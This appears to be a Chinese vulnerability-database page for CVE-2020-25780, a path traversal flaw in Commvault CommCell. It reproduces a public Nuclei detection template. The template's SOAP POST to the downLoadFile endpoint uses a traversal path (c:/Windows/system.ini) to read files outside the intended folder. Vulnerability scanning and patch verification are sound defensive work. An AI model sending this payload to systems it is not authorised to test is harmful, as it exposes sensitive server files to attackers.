CVE-2020-25780: Commvault CommCell - Local File Inclusion

日期: 2025-08-01 | 影响软件: Commvault CommCell | POC: 已公开

漏洞描述

CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.

PoC代码[已公开]

id: CVE-2020-25780

info:
  name: Commvault CommCell - Local File Inclusion
  author: pdteam
  severity: high
  description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.
  remediation: |
    Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability.
  reference:
    - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html
    - http://kb.commvault.com/article/63264
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25780
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-25780
    cwe-id: CWE-22
    epss-score: 0.41514
    epss-percentile: 0.97328
    cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: commvault
    product: commcell
  tags: cve,cve2020,commvault,lfi

http:
  - method: POST
    path:
      - "{{BaseURL}}/SearchSvc/CVSearchService.svc"

    body: |
      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
         <soapenv:Header/>
         <soapenv:Body>
            <tem:downLoadFile>
               <tem:path>c:/Windows/system.ini</tem:path>
            </tem:downLoadFile>
         </soapenv:Body>
      </soapenv:Envelope>

    headers:
      Cookie: Login
      soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile
      content-type: text/xml

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "downLoadFileResult"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100deceea6a6b6db0c19a032d98a7e0a5f5b6aaf8b5b208bb1f5f692d5314e19edb022060ff1910ea5625c743580d2f582153ae3df26926c404b955f16b28f01c7f180b:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-25780.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2020-10199: Nexus Repository before 3.21.2 allows JavaEL Injection POC

CVE-2020-11455: LimeSurvey 4.1.11 - Path Traversal POC

CVE-2020-11738: WordPress Duplicator plugin Directory Traversal POC

CVE-2020-11991: Apache Cocoon 2.1.12 XML Injection POC

CVE-2020-13379: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery POC